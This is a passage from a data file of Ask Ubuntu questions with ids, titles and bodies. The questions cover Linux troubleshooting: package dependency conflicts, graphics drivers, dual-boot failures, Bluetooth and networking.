x11-xkb-utils x11-xserver-utils xauth xdg-user-dirs-gtk xdiagnose xinit xinput xorg xsel xserver-common xserver-xorg xserver-xorg-core xserver-xorg-glamoregl xserver-xorg-input-all xserver-xorg-input-evdev xserver-xorg-input-mouse xserver-xorg-input-synaptics xserver-xorg-input-vmmouse xserver-xorg-input-wacom xserver-xorg-video-all xserver-xorg-video-ati xserver-xorg-video-cirrus xserver-xorg-video-fbdev xserver-xorg-video-intel xserver-xorg-video-mach64 xserver-xorg-video-mga xserver-xorg-video-modesetting xserver-xorg-video-neomagic xserver-xorg-video-nouveau xserver-xorg-video-openchrome xserver-xorg-video-qxl xserver-xorg-video-r128 xserver-xorg-video-radeon xserver-xorg-video-s3 xserver-xorg-video-savage xserver-xorg-video-siliconmotion xserver-xorg-video-sis xserver-xorg-video-sisusb xserver-xorg-video-tdfx xserver-xorg-video-trident xserver-xorg-video-vesa xserver-xorg-video-vmware xterm xul-ext-unity xul-ext-websites-integration yelp zeitgeist zeitgeist-datahub zenity the following new packages will be installed : docbook-xml docbook-xsl fonts-droid libencode-locale-perl libfile-listing-perl libfont-afm-perl libgpod4-nogtk libhtml-form-perl libhtml-format-perl libhtml-parser-perl libhtml-tagset-perl libhtml-tree-perl libhttp-cookies-perl libhttp-daemon-perl libhttp-date-perl libhttp-message-perl libhttp-negotiate-perl libio-html-perl liblwp-mediatypes-perl liblwp-protocol-https-perl libnet-http-perl librarian0 libwww-perl libwww-robotrules-perl libxml2-utils rarian-compat sgml-data unity-scope-video-remote 0 upgraded , 28 newly installed , 538 to remove and 0 not upgraded . need to get 6954 kb of archives . after this operation , 2338 mb disk space will be freed . do you want to continue [ y/n ] ? edit i can try to do this ( but it will have more or less the same output ) : $ sudo apt-get install libxcb1=1.9.1-3ubuntu1 reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : content-hub deluge-common extlinux fonts-texgyre gir1.2-gconf-2.0 gsettings-ubuntu-touch-schemas libandroid-properties1 libboost-program-options1.53.0 libboost-python1.53.0 libc-ares2 libcontent-hub0 libcpufreq0 libdee-qt5-3 libgflags2 libgfortran3 libgoogle-glog0 libgsettings-qt1 libhardware2 libhud2 libhybris libhybris-common1 liblapack3 libmedia1 libmikmod2 libmirclient3 libmirplatform libmirprotobuf0 libmirserver7 libofono-qt1 libphonon4 libportmidi0 libqdjango-db0 libqt5organizer5 libqt5qml-graphicaleffects libqt5systeminfo5 libqt5xmlpatterns5 libreoffice-l10n-en-gb libsdl-mixer1.2 libsdl-ttf2.0-0 libsmi2ldbl libsmpeg0 libsystemsettings1 libthumbnailer0 libtorrent-rasterbar7 libubuntu-application-api-mirserver1 libubuntu-application-api1 libubuntu-location-service0 libubuntu-platform-hardware-api1 libubuntudownloadmanager1 libunity-action-qt1 libunwind8 libupstart-app-launch1 libwireshark-data libwireshark3 libwiretap3 libwsutil3 ofono p7zip-full powerd preview-latex-style ps2eps python-compizconfig python-libtorrent python-numpy python-pygame python3-gnupg python3-sip qtdeclarative5-dee-plugin qtdeclarative5-folderlistmodel-plugin qtdeclarative5-gsettings1.0 qtdeclarative5-systeminfo-plugin qtdeclarative5-unity-action-plugin qtdeclarative5-unity-notifications-plugin qtdeclarative5-xmllistmodel-plugin sqlite3 syslinux-themes-debian syslinux-themes-debian-wheezy system-image-common system-image-dbus tex-gyre ttf-marvosym ubuntu-download-manager ubuntu-mobile-icons ubuntu-touch-sounds ubuntu-ui-toolkit-theme unetbootin-translations usermetricsservice wireshark-common use 'apt-get autoremove ' to remove them . the following extra packages will be installed : fonts-droid unity-lens-friends unity-scope-musicstores unity-scope-video-remote the following packages will be removed : account-plugin-google activity-log-manager activity-log-manager-control-center apport-gtk apturl bamfdaemon baobab bluez-cups clementine compiz compiz-gnome compiz-plugins compiz-plugins-default compiz-plugins-extra compizconfig-settings-manager copyq cups deja-dup deja-dup-backend-gvfs deluge deluge-gtk dropbox eog evince evolution-data-server evolution-data-server-goa fbmessenger file-roller firefox flashplugin-installer gcr gedit gimp gir1.2-appindicator3-0.1 gir1.2-gdata-0.0 gir1.2-gnomebluetooth-1.0 gir1.2-goa-1.0 gir1.2-gtk-3.0 gir1.2-nautilus-3.0 gir1.2-pango-1.0 gir1.2-peas-1.0 gir1.2-rb-3.0 gir1.2-totem-1.0 gir1.2-vte-2.90 gir1.2-webkit-3.0 gir1.2-wnck-3.0 gkbd-capplet gksu gnome-bluetooth gnome-calculator gnome-contacts gnome-control-center gnome-control-center-datetime gnome-control-center-signon gnome-control-center-unity gnome-disk-utility gnome-font-viewer gnome-icon-theme gnome-icon-theme-symbolic gnome-keyring gnome-mines gnome-power-manager gnome-screensaver gnome-screenshot gnome-session gnome-session-bin gnome-session-canberra gnome-settings-daemon gnome-sudoku gnome-system-log gnome-system-monitor gnome-terminal gnome-user-guide gnome-user-share gnomine google-chrome-stable grub-customizer gstreamer0.10-plugins-bad gstreamer0.10-plugins-good gstreamer0.10-x gstreamer1.0-clutter gstreamer1.0-plugins-bad gstreamer1.0-plugins-good gstreamer1.0-x gtk2-engines-murrine gtk3-engines-unico gucharmap gvfs gvfs-backends gvfs-daemons gvfs-fuse hplip humanity-icon-theme ibus ibus-gtk ibus-gtk3 ibus-pinyin ibus-table indicator-application indicator-appmenu indicator-bluetooth indicator-cpufreq indicator-keyboard indicator-multiload indicator-printers indicator-session indicator-sync intel-gpu-tools landscape-client-ui-install language-selector-gnome latex-beamer latex-xcolor latexmk libaccount-plugin-1.0-0 libaccount-plugin-generic-oauth libaccount-plugin-google libappindicator1 libappindicator3-1 libcairo-gobject2 libcairo-perl libcairo2 libcairomm-1.0-1 libcanberra-gtk-module libcanberra-gtk0 libcanberra-gtk3-0 libcanberra-gtk3-module libcheese-gtk23 libcheese7 libclutter-1.0-0 libclutter-gst-2.0-0 libclutter-gtk-1.0-0 libcogl-pango12 libcogl12 libevdocument3-4 libevview3-3 libfarstream-0.1-0 libfarstream-0.2-2 libfolks-eds25 libgail-3-0 libgail-common libgail18 libgcr-3-1 libgcr-ui-3-1 libgdata13 libgegl-0.2-0 libgimp2.0 libgksu2-0 libgl1-mesa-glx libglade2-0 libglamor0 libglew1.8 libglewmx1.8 libglu1-mesa libgnome-bluetooth11 libgnome-control-center1 libgnome-desktop-3-7 libgnomekbd8 libgoa-1.0-0 libgrip0 libgtk-3-0 libgtk-3-bin libgtk2-perl libgtk2.0-0 libgtk2.0-bin libgtkmm-3.0-1 libgtksourceview-3.0-1 libgucharmap-2-90-7 libgweather-3-3 libgxps2 libido3-0.1-0 libindicator3-7 libindicator7 libmagickcore5-extra libmetacity-private0a libnautilus-extension1a libnm-gtk0 libnux-4.0-0 libpango-perl libpango1.0-0 libpangocairo-1.0-0 libpangomm-1.4-1 libpeas-1.0-0 libpoppler-glib8 libpurple0 libqt4-opengl libqt53d5 libqt5gui5 libqt5location5 libqt5opengl5 libqt5printsupport5 libqt5quick5 libqt5webkit5 libqt5widgets5 libqtwebkit4 libreoffice-base-core libreoffice-calc libreoffice-core libreoffice-draw libreoffice-gnome libreoffice-gtk libreoffice-help-en-gb libreoffice-help-en-us libreoffice-impress libreoffice-math libreoffice-ogltrans libreoffice-pdfimport libreoffice-presentation-minimizer libreoffice-writer librhythmbox-core7 librsvg2-2 librsvg2-common libtelepathy-farstream3 libtimezonemap1 libtotem0 libufe-xidgetter0 libunity-core-6.0-8 libunity-gtk2-parser0 libunity-gtk3-parser0 libunity-misc4 libunity-webapps0 libvisual-0.4-plugins libvte-2.90-9 libwebkitgtk-1.0-0 libwebkitgtk-3.0-0 libwnck-3-0 libwnck22 libxcb-dri3-0 libxcb-image0 libxcb-shm0 libyelp0 light-themes lightdm-remote-session-freerdp lightdm-remote-session-uccsconfigure luatex mousetweaks mythes-en-us nautilus nautilus-image-tools nautilus-sendto nautilus-share network-manager-gnome network-manager-openvpn-gnome network-manager-pptp-gnome notify-osd nux-tools nvidia-settings-319-updates onboard onboard-data oneconf overlay-scrollbar overlay-scrollbar-gtk2 overlay-scrollbar-gtk3 pgf phonon phonon-backend-gstreamer plymouth-label plymouth-theme-ubuntu-logo policykit-1-gnome poppler-utils printer-driver-gutenprint printer-driver-hpcups printer-driver-postscript-hp prosper python-appindicator python-aptdaemon.gtk3widgets python-cairo python-gi-cairo python-glade2 python-gnomekeyring python-gtk2 python-nautilus python-notify python-qt4 python-ubuntu-sso-client python3-aptdaemon.gtk3widgets python3-cairo python3-gi-cairo python3-pyatspi python3-pyqt4 python3-pyqt4.phonon python3-uno remmina remmina-plugin-rdp remmina-plugin-vnc screen-resolution-extra seahorse sessioninstaller shotwell signon-plugin-oauth2 signon-ui simple-scan software-center software-properties-gtk ssh-askpass-gnome steam-launcher synaptic system-config-printer-gnome telepathy-haze telepathy-indicator texlive texlive-base texlive-binaries texlive-extra-utils texlive-font-utils texlive-fonts-recommended texlive-fonts-recommended-doc texlive-generic-recommended texlive-latex-base texlive-latex-base-doc texlive-latex-extra texlive-latex-extra-doc texlive-latex-recommended texlive-latex-recommended-doc texlive-luatex texlive-pictures texlive-pictures-doc texlive-pstricks texlive-pstricks-doc tipa ubuntu-artwork ubuntu-desktop ubuntu-docs ubuntu-mono ubuntu-release-upgrader-gtk ubuntu-sso-client ubuntu-tweak unetbootin unity unity-asset-pool unity-greeter unity-gtk2-module unity-gtk3-module unity-lens-applications unity-scope-calculator unity-scope-manpages unity-services unity-tweak-tool unity-webapps-common unity-webapps-service update-manager update-notifier usb-creator-gtk vino vlc vlc-plugin-notify wireshark x11-utils xdg-user-dirs-gtk xdiagnose xorg xserver-xorg-glamoregl xul-ext-unity xul-ext-websites-integration yelp zeitgeist zeitgeist-datahub zenity the following new packages will be installed : fonts-droid unity-lens-friends unity-scope-musicstores unity-scope-video-remote the following packages will be downgraded : libxcb1 0 upgraded , 4 newly installed , 1 downgraded , 357 to remove and 0 not upgraded . need to get 3188 kb of archives . after this operation , 2039 mb disk space will be freed . do you want to continue [ y/n ] ?
407917	how can i change the rules that dictate which monitor an application will open on ?	in a dual monitor setup , programs always seem to open on the left monitor ( at least in kubuntu , i do n't know about ubuntu ) . is there any way to change this behavior to something more elaborate , to take full advantage of having two monitors ? for example , i may want to have the default screen alternate each time a window is opened . or i may want windows to open on whatever screen the mouse pointer is in .
407919	windows 7 unbootable , installed ubuntu 12.04 as secondary os but now ca n't find it ? ( long )	gateway dx series so my windows 7 os became unresponsive after an unexpected shutdown followed by an interuted restart , and kept giving me bsod 's over and over again with the error codes '' stop : 0x0000007b '' tried to access safe mode and getting stuck on the classpnp.sys over and over again even after entering command prompt where chkdsk and sfc/scannow returned no system file errors.every time i would do a test which would require results to be given to me , the system would ask me to reboot for actions to take place but everytime i did that , it 's as if the machine forgets it had a previous task . i dug a bit and it seems to be an issue that can only be resolved by reinstaling windows 7 or restoring to factory settings . now i do n't want to lose all my files , something both of these options would do . i decided to install ubuntu as a secondairy os and boot it from a usb . so i change the boot order to `` removable device '' first and is start . the first two times it failed , the thrid time it took longer to load onto the usb and i got to the ubuntu install page which failed because it said it was unable to install the grub2 boot file . so i shutdown and start over , i choose `` something else '' so to install it alongside win7 and this time all goes well , im connected to the internet , i 've browsed a bit , this time it seems to linger over the grub2 file but in the end i get this window installation complete '' installation is complete . you need to restart the computer in order to use the new installation . '' now when i did restart the computer got this error message : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do n't have this disc , contact your system administrator or computer manufacturer for assistance . status : 0xc0000225 info : the boot selection failed because a required device is inaccessible . now i tried to press the left shift key when the computer starts to no avail and when i pressed f8 i only got offered the chance to pick windows7 and ubuntu was no where to be found i went on a thread and someone mentionned something about the efi device appearing in the boot priority order but then no one gave an answer to that . i am currently making a new bootable usb for ubuntu but can anyone please help me ? i 'm at loss as to what 's the next step to take to have ubuntu show up when i restart after the instal and as to how to transfer my files from an unresponsive windows7 to ubuntu .
407921	how to install skype on 64bit ubuntu 13.10 ( broken dependencies )	i 'm sure this is a duplicate candidate , but i have looked at the answer for 64bit 12.10 , but it does n't seem to work for my 13.10 installation . i have enabled 32bit architecture , ie . sudo dpkg -- add-architecture i386 sudo apt-get update i have added the canonical repository ( and confirmed in `` software sources '' that it seems to be there ) . sudo add-apt-repository `` deb http : //archive.canonical.com/ $ ( lsb_release -sc ) partner '' i have tried cleaning the dependency tree up : sudo apt-get clear sudo apt-get autoclean sudo apt-get -f install sudo dpkg -- configure -a sudo apt-get -f install sudo apt-get -u dist-upgrade and as far as i understand from the instructions linked above , no problems are reported . if i then try to install skype : nsa @ quadrupod : ~ $ sudo apt-get install skype reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . skype : depends : skype-bin e : unable to correct problems , you have held broken packages . not overly surprising , so i try installing skype-bin , as indeed is suggested and found to work in some answers : nsa @ quadrupod : ~ $ sudo apt-get install skype-bin reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . skype-bin : i386 : depends : libasound2 : i386 ( > = 1.0.23 ) depends : libc6 : i386 ( > = 2.7 ) but it is not going to be installed depends : libgcc1 : i386 ( > = 1:4.1.1 ) but it is not going to be installed depends : libqt4-dbus : i386 ( > = 4:4.5.3 ) but it is not going to be installed depends : libqt4-network : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqt4-xml : i386 ( > = 4:4.5.3 ) but it is not going to be installed depends : libqtcore4 : i386 ( > = 4:4.7.0~beta1 ) but it is not going to be installed depends : libqtgui4 : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqtwebkit4 : i386 ( > = 2.2~2011week36 ) but it is not going to be installed depends : libstdc++6 : i386 ( > = 4.6 ) but it is not going to be installed depends : libx11-6 : i386 but it is not going to be installed depends : libxext6 : i386 but it is not going to be installed depends : libxss1 : i386 but it is not going to be installed depends : libxv1 : i386 but it is not going to be installed depends : libssl1.0.0 : i386 but it is not going to be installed depends : libgl1-mesa-glx : i386 but it is not going to be installed recommends : sni-qt : i386 but it is not going to be installed recommends : libasound2-plugins : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . ok , so i try to look up what these held/broken packages might be , according to this link and this link from here : apt-mark showhold returns nothing . dpkg -- get-selections | grep hold and dpkg -l | grep ^h also returns nothing . so what is held ? i tried the suggestion here of using synaptic . it claims to fix broken packages , however to install skype it wants to uninstall most of the system , including gnome-control-center , gnome-system-monitor , gnome-user-guide , the file lens , the clock ( indicator-datetime ) , apt-utils , lib32gc1 , ( which is one of the dependencies apt-get thinks skype needs amongst others on a long list . i do n't see any obvious replacements on the much shorter list of what it thinks needs installing . i also tried sudo aptitude install skype . with a similar result , it gives a list of stuff to uninstall that is so long it exceeds the normal terminal buffer and i had to pipe it to a file to read it . as above it includes things that do not sound wise to remove , including 73 ) gnome-bluetooth 74 ) gnome-calculator 75 ) gnome-contacts 76 ) gnome-control-center 77 ) gnome-control-center-datetime 78 ) gnome-control-center-signon 79 ) gnome-control-center-unity 80 ) gnome-disk-utility 81 ) gnome-font-viewer 82 ) gnome-icon-theme 83 ) gnome-icon-theme-symbolic 84 ) gnome-keyring 85 ) gnome-mahjongg 86 ) gnome-mines 87 ) gnome-orca 88 ) gnome-power-manager 89 ) gnome-screensaver 90 ) gnome-screenshot 91 ) gnome-session 92 ) gnome-session-bin 93 ) gnome-session-canberra 94 ) gnome-settings-daemon 95 ) gnome-sudoku 96 ) gnome-system-log 97 ) gnome-system-monitor 98 ) gnome-terminal 99 ) gnome-user-guide 100 gnome-user-share and also wants to uninstall over 400 other packages . i would have thought i needed these.. ? now it isnâ´t a long time since i installed ubuntu , but before i start over , has anybody got any ideas ? does it somehow think it should replace all 64bit stuff ?
407925	12.04 computers ca n't `` see '' each other or 10.04 computer , but not vice-versa	there are three ubuntu computers on our lan : 2 x 12.04 , 1 x 10.04 and one win xp . each computer can ping the other . using places/network : 1 ) the 10.04 computer lists : a ) itself b ) windows networks ( clicking on this shows mshome and workgroup . clicking on mshome , shows the windows-only ( i.e. , no dual boot ) computer on the network and i can log into it . clicking on workgroup shows the 10.04 computer [ itself ] ) 2 ) the first 12.04 computer ( 12.04-1 ) lists : ( for info : does not list itself ) a ) the 10.04 computer b ) windows networks ( clicking on this shows mshome and workgroup : -clicking on mshome , shows the only win computer [ taking a long time to show ] . this computer can sign into the win computer . -clicking on workgroup shows the 10.04 computer . clicking on that and signing in shows the desktop of the 10.04 . i can copy files from 10.04 to 12.04-1 [ this computer ] , but can not write to 10.04 ) 3 ) the second 12.04 computer ( 12.04-2 ) lists : ( does not list itself ) a ) the 10.04 computer b ) windows networks ( clicking on this shows mshome and workgroup . -clicking on mshome , shows the only windows-only computer on the network [ taking a long time to show ] . this computer can sign into the win computer and copy files from but can not copy files to the win -clicking on workgroup shows the 10.04 computer . clicking on that shows the desktop of the 10.04 . i can copy files from 10.04 to 12.04-2 [ this computer ] , but can not write to 10.04 ) 4 ) from inside workgroup , the win xp computer network shows only the 10.04 computer , but not the two 12.04 computers it appears that something needs to be enabled on the two 12.04 computers so that they are visible to each other , to the 10.04 , and to the win . what information can i provide that will help determine the problem ? ( btw , i may be just out of the newbie category , but maybe not . please keep in mind as my experience is limited . thanks . )
407930	why do i need to enter a password to `` unlock login keyring '' ?	i am being asked to ... '' enter password to unlock your login keyring '' i do n't understand why this popup keeps coming up . i type in a password when i login to ubuntu and if i look in 'passwords and keys ' there is no such keyring ... please help
407931	ssh x11 forwarding dual monitor	is there a way to start up ssh x11 forwarding on a different monitor ? namely , if i start up the desktop environment with x11 , and forward it to the local machine , can i send it to a different monitor ( and at the same cutting off the current x11 session from it ? )
407932	linux connection network	i have a problem on my dell d630 laptop , i ca n't connect to wifi , or with ethernet cable . i recently downloaded ubuntu and i would like to use it , but as you see i can not connxt to the internet
407934	black screen after installing catalyst 13.12	i 'm having a serious issue with my ubuntu 13.10 installation . i have recently upgraded from 13.04 and everything was working fine . i was using some generic drivers and was everything was pretty nice . but today i wanted to play some minecraft ( my goal is to completely switch to linux from windows ) but i was not satisfied with number of fps . so i tried to install some amd drivers . first attempt was to install from ubuntu repositories . i was successful , but it did n't help me much . so then i have found this nice page . i made one mistake ( at least i think i did ) , i have donwloaded newest stable release of catalyst drivers ( 13.12 ) instead of 13.11 beta mentioned in the article . my system basically died after that . i followed all the instructions and i failed . after i reboot and select system from grub i see just a black page . not even a login screen ! i have tried to use recovery mode . i enabled networking and used root command line tool . i was hoping to remove the drivers and replace them with some generic ones . i applied commands : sudo apt-get remove -- purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* sudo rm /etc/x11/xorg.conf sudo apt-get install -- reinstall xserver-xorg-core xserver-xorg-video-intel libgl1-mesa-glx libgl1-mesa-dri libgl1-mesa-glx : i386 libgl1-mesa-dri : i386 sudo dpkg-reconfigure xserver-xorg sudo reboot did n't help at all . my system is still dead . i ca n't even get to login screen . my specs : amd hd 7850 1gb core i7 3770k ( it has built-in intel graphics ) ubuntu 13.10 64-bit 8gb ram i was logged to gnome-flashback no-effects session ( because i do n't like unity ) . please , can anyone help me ? i do n't really know what to do . i was searching the web , but without any success ...
407936	i have a lacie external hard drive . i do not find drivers on their website . how do i initialize the drive ? do i add commands in terminal mode ?	i have a lacie external hard drive . it apparently is not plug and play . there are no debian or other drivers on their website . are there instructions that i need to add in terminal mode to get this new drive recognized ?
407939	mounting the persistence partition ( casper-rw ) read-only	i 'm trying to create a fresh iso image for use on a usb stick . i 've partitioned my usb stick into 2 partitions , one vfat and one ext4 . the vfat partition has the iso and grub2 installed to it , such that grub2 boots the iso . the ext4 partition has the volume label casper-rw and is used as the persistent data store for the live usb . i 've modified the grub.cfg such that i get two options at boot , one to boot the iso in persistent mode and one to boot normally . however , when booting in `` normal '' mode , the casper-rw partition is mounted as a normal drive and changes made in persistent mode do n't stay . what i would like is the casper-rw partition to be mounted overlaid on the / filesystem , but when i ask ubuntu to boot normally ( i.e. , without the persistent option in grub2 ) , i 'd like that partition to be mounted read-only so that changes made in the persistent mode persist . what is the best way to achieve this ?
407942	lubuntu on acer netbook detects vga monitor , but monitor not showing anything	hope someone can help me with a rather frustrating issue : i 've installed lubuntu on an old acer netbook ( aspire one , to be exact ) , but my 1920x1080 monitor is not showing anything when connected to the netbook via vga even though : i 've installed anadr and the app shows that the monitor is detected ( it even shows the available resolutions ) . if i connect the same vga cable via thunderbolt adaptor to my macbook air , it works just fine ( so no issue with monitor nor vga ) . the monitor keeps saying `` no signal detected '' when connected via the same vga cable to the netbook .
407943	how to get nvidia settings to stick	i 'm running ubuntu 13.10 and am having trouble with nvidia-settings . i 've got two monitors and two gtx 560tis running sli . i plugged both monitors into one card and when i run nvidia-settings using sudo i can change the monitor rotations , positions etc and save and it works . however , rebooting i lose all my changes . i did a bit of research and found i have to tell nvidia-settings to save to the x config file . i tried finding the existing xorg.conf or xorg.conf.d and found nothing on my computer . if i save in /etc/x11/xorg.conf ( .d ) when i boot up i get an error saying there is something wrong with my graphics card or with my x settings . i have to access the shell and delete the file and reboot . if i save in /usr/share/x11/20-nvidia.conf xorg crashes at boot but renames the file to a .backup and is able to recover ( with none of my settings saved ) . the crash report includes xorg crashed with sigabrt in osabort ( ) .proc.driver.nvidia.gpus.0 error : [ errno 21 ] is a directory : '/proc/driver/nvidia/gpus/o' .proc.driver.nvidia.gpus.1 error : [ errno 21 ] is a directory : '/proc/driver/nvidia/gpus/1' am i doing something wrong or does this sound like a bug in the driver/settings panel ( i 've found a few of those logged ) .
407944	window vista 32 bit installation	i am a not a computer geek , so i probably think this is dumb questions.. i have a vista 32 bit and trying to install ubuntu , when i run the file with iso player , it said that i need to reboot pc and run as cd . and i do not know how to do this.. the thing is that i do n't have a cd to burn that iso file and not sure it will work even if i burn iso file . anyone can help me out about it ?
407945	ca n't view files on windows 8 partition	i seem to be having a problem with windows 8 on my desktop pc ( not able to boot ) , so i created a bootable usb stick with ubuntu to see if i can use it to access my hard disk and hopefully recover at least some of my data . upon booting into ubuntu ( from the usb ) , the partitions on the windows hard disk seem to be mounted ; however most of the files do not appear in the browser . the top-level folders are there ( users , windows , program files , etc . ) , but they seem empty . does anyone know if this is some sort of compatibility issue between linux and windows ? the thing is , i also tried checking the files using the windows command prompt ( from the builtin diagnostic tool ) and the folders look similarly empty there , which probably is n't looking good . the machine is a dell inspiron 660 desktop with windows 8 , which i bought just over a year ago . it has an intel core i5 processor and about 8gb ram . i confess that i did n't get round to creating a recovery disk or make any system backups ( i know , my bad ... ) . i know there is an option in the windows diagnostics to reset the system back to 'factory settings ' ; however , i have n't tried that yet as i 'm still hopeful of being able to recover my files . if anyone has any ideas or suggestions , i 'd be very grateful . btw , i 'm quite enjoying this little taste of ubuntu and i 'm seriously considering switching permanently ( getting a bit fed up with this windows 8 trash ... ) : - )
407946	can ubuntu for phones be installed on an iphone 4 ?	i have a gsm iphone 4 , i was wondering if it 's possible to install ubuntu for phones on the iphone ?
407947	installing using a live usb gets stuck on busybox ( 13.10 )	i used the usb installer as recommended here ( http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows ) i used the desktop version 13.10 i downloaded here ( http : //www.ubuntu.com/download/desktop ) . when i boot from the usb and it shows the ubuntu loading screen then it goes directly to a `` busybox '' thing . it then says something like `` no live something found '' ( sorry i did n't write it down ) . i 'm running windows 7 64 bit . i 'm planning to have ubuntu run alongside windows . and also , i 'm new to the linux world , i have a laptop running just elementary os but that 's the most i 've done . please help and thanks in advance . : )
407953	why is n't there an easy way to change key bindings ?	whenever i search for a way to change key bindings in ubuntu , the only thing that comes up is xbindkeys . i 'm sure that program is good for complicated bindings , but all i want to do is use the function keys without having to hit the fn button everytime . not only is xbindkeys confusing , it simply does n't recognize my fn key . does anyone know of a way that i can simply remove the need for the function button so that , for example , f12 raises the volume ? the keyboard settings have this ability built in for volume ... . unfortunately for some reason it does n't include that same ability for brightness . anyone have ideas ?
407963	first install , nvidia geforce 4 4200 , gpu lockup	i used my wintel box to download ubuntu 12.04 lts . burned an install dvd and installed on my laptop ( dell inspiron 8500 ) . when i try to boot the laptop from the hard drive i get a gpu lockup message . if i let it sit , after a few minutes i get messages about a channel failing to idle . these repeat every few minutes . i have read some other posts and it sounds like i still ought to be able to do something , but i have no idea what . my gpu is an nvida geforce 4 4200 . i am a total newbie at linux . i have mark sobell 's practical guide to ubuntu linux . i will search it as well . any help would be greatly appreciated .
407968	wammu no longer displays names correctly	on my xubuntu 12.04.4 system , i 'm finding that wammu no longer displays names correctly . instead , i get records ( for sim or phone memories ) like : 22 me 4b6172796e48 +6139541234 23 me 4f766572736561732043617265 +61414567890 the phone is a nokia asha 300 , names are stored and display correctly within the phone , and nothing has changed recently afaik . anyone else seen this and/or know how to fix it ?
407970	how to reset gnome 3 contacts ?	i 've switched to gnome 3 recently , and now trying to figure out how the contacts app/integration works . i had some issues in the beginning with my google account and now it mixed a `` local adress book '' ( another application had the brilliant idea to import my google contacts and store them as local ) with a google adressbook . now i am left with a lot of duplicates and mixed contacts . i wanted to reset the contacts , and start fresh , but ca n't figure out how i would do that . i did try restarting the initial setup , by disabling dconf `` org > gnome > contacts > did-initial-setup '' - which triggered it , but that did not reset my contacts either . it made it even worse , after that i now have 3 accounts listed in it , the same google account twice and a local adressbook . disabling and even completely removing my google account from the online-accounts settings and keychain does not seem to affect it . can anyone tell me where these things are stored ? how can i wipe the contacts from the system and start fresh ? in case it matters , this is gnome shell 3.8.4 ( ubuntu gnome 13.10 )
407976	bluetooth not working on ubuntu 13.10 in dell inspiron 15 3521	username @ xterm : ~ $ dmesg | grep bluetooth [ 18.281343 ] bluetooth : core ver 2.16 [ 18.281368 ] bluetooth : hci device and connection manager initialized [ 18.281377 ] bluetooth : hci socket layer initialized [ 18.281381 ] bluetooth : l2cap socket layer initialized [ 18.281390 ] bluetooth : sco socket layer initialized [ 18.321036 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 18.321040 ] bluetooth : bnep filters : protocol multicast [ 18.321049 ] bluetooth : bnep socket layer initialized [ 18.321780 ] bluetooth : rfcomm tty layer initialized [ 18.321791 ] bluetooth : rfcomm socket layer initialized [ 18.321793 ] bluetooth : rfcomm ver 1.11 [ 18.489583 ] bluetooth : ca n't load firmware , may not work correctly [ 20.495140 ] bluetooth : hci0 command 0x1003 tx timeout [ 8674.475615 ] bluetooth : ca n't load firmware , may not work correctly [ 8676.482347 ] bluetooth : hci0 command 0x1003 tx timeout [ 8885.603895 ] bluetooth : ca n't load firmware , may not work correctly when i start bluetooth to set up new device , i ca n't search any other devices instead switching on devices . how to fix problem at least bluetooth start working ... i face problem to share files from handset to pc and vice versa.. plaese i am using dell inspiron i3 15 3521 , please help me as posible as you may .
407977	change the device order for graphics cards	ubuntu 13.10 . mining rig . 7ea graphics cards ( 2 7900 's and 5 7800 's ) . adapter 0 is a 7900 , adapter 1-5 shows 7800 , adapter 6 shows 7900 . how can i make adapter 0 and 1 7900 's while 2-6 are 7800 's ? thanks !
407978	problem installing ubuntu alongside with windows 8.1	i did everything right according to the guide but when i restart my computer , windows can not detect the operating system because some files are missing it says but i installed it with no problem at all . what 's the problem ? is it the windows 8.1 that i upgraded recently or the ubuntu files ? please needed for study
407979	remote desktop connection with ubuntu server 13.10	i had a pc running ubuntu server 12.04 and rdc was working fine but when i upgraded to ubuntu 13.10 when i go to connect i just get a grey screen . i would like to just be able to login and use the terminal , so i do n't want to use xfce . is there anyway i can do this on 13.10 ?
407980	i installed php5 in ubuntu 13.04 but when i restart apache sever using command `` sudo /etc/init.d/apache2 restart '' it was showing error	it is showing error , when i restarting apache sever . it was showing like below image . i am using internet with proxy ( 172.31.1.6 ) on ironport .
407981	how do i get imdb thumbnailer working with nemo file manager ?	i have been trying to get the imdb thumbnailer working in nautlus ( ubuntu 13.10 ) but it 's still not generating imdb posters . i hear pinguy has it with nemo but i do n't know how to get it with nemo either . please help .
407983	installing with wubi	i want to give ubuntu a try , but i do n't have a disc or usb lying around so i decided to use the wubi installer . if i erase the copy of windows that i use to install wubi , will i still be able to access wubi ?
407985	how to turn off dgpu on asus s56cb aka k56cb with bumblebee ?	i run xubuntu 13.10 on the above-mentioned laptop , sporting optimus . the battery life is disappointing . i 'd like to improve it by means of turning off the geforce 740 with bumblebee but something has gone wrong . i 've done the minimal installation described here ( https : //wiki.ubuntu.com/bumblebee ) without installing any driver . $ sudo add-apt-repository ppa : bumblebee/stable $ sudo apt-get update $ sudo apt-get install -- no-install-recommends bumblebee then i 've tried to turn the geforce off as said here ( https : //github.com/bumblebee-project/bbswitch # usage ) with $ sudo tee /proc/acpi/bbswitch < < < off but the card stays on ... $ cat /proc/acpi/bbswitch 0000:01:00.0 on could anyone help me ? thanks .
407987	nvidia mx 440 drivers ?	i have another pc , a pentium iv with a nvidia mx 440 , i installed lubuntu 13.10 , but it does n't have the drivers for the video , which version do you recommend ?
